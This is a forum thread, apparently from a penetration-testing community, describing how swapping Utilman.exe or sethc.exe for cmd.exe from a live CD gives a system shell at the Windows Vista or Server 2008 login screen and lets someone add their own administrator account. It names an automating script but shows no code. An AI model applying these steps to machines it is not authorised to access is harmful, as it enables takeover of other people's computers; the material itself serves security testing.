If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

Gaining System-Level Access To Vista

I know that you can do it from any liveCD linux distro, though I thought it was cool that BackTrack got the publicity. Anyways, I went ahead and tried it out with my copy of Windows Server 2008 Enterprise (thanks microsoft launch tour). It worked flawlesly, and instead of running "explorer" from the Utilman.exe promt, i ran "lusrmgr.msc" and simply added my own administrator account. I got out of utilman, clicked cancel for the Windows login, did a ctr+alt+del and my new TEST_ADMIN account was waiting for me to login.

I wasn't able to do anything once i ran explorer from utilman, except run firefox (from which i was able to browse the net) which i had installed previously while logged into the admin account. it was all so easy...

file

Theres a quick script i wrote in /pentest/passwd called utilman.py

if you run that on a local vista system, it'll detect the partition, backup utliman.exe and rename cmd.exe to Utilman.exe, its all automated. Don't run this on a WinXP box..I sent muts an updated utilman.py that never made it on BT3 that specifically detects only Vista, however if you run this on XP, it'll rename the utilman.exe on XP which doesn't work.

While you're at it...

While you're being a good little code monkey...
can't hurt to throw in a script for XP, 2003, etc as well. A replacement for the sethc.exe (windows sticky key feature) would work the same. Replacement of sethc.exe with cmd.exe or your choice of fun.

Bet your enterprise will be hopping on full disk encryption "solutions" [even though most of them are crippled by configuration changes the vendors should never give the end users options to cripple] to keep your friendly sticky keys from going rogue.

We live in good times, and yes, my firewire ports have rubber cement in them.....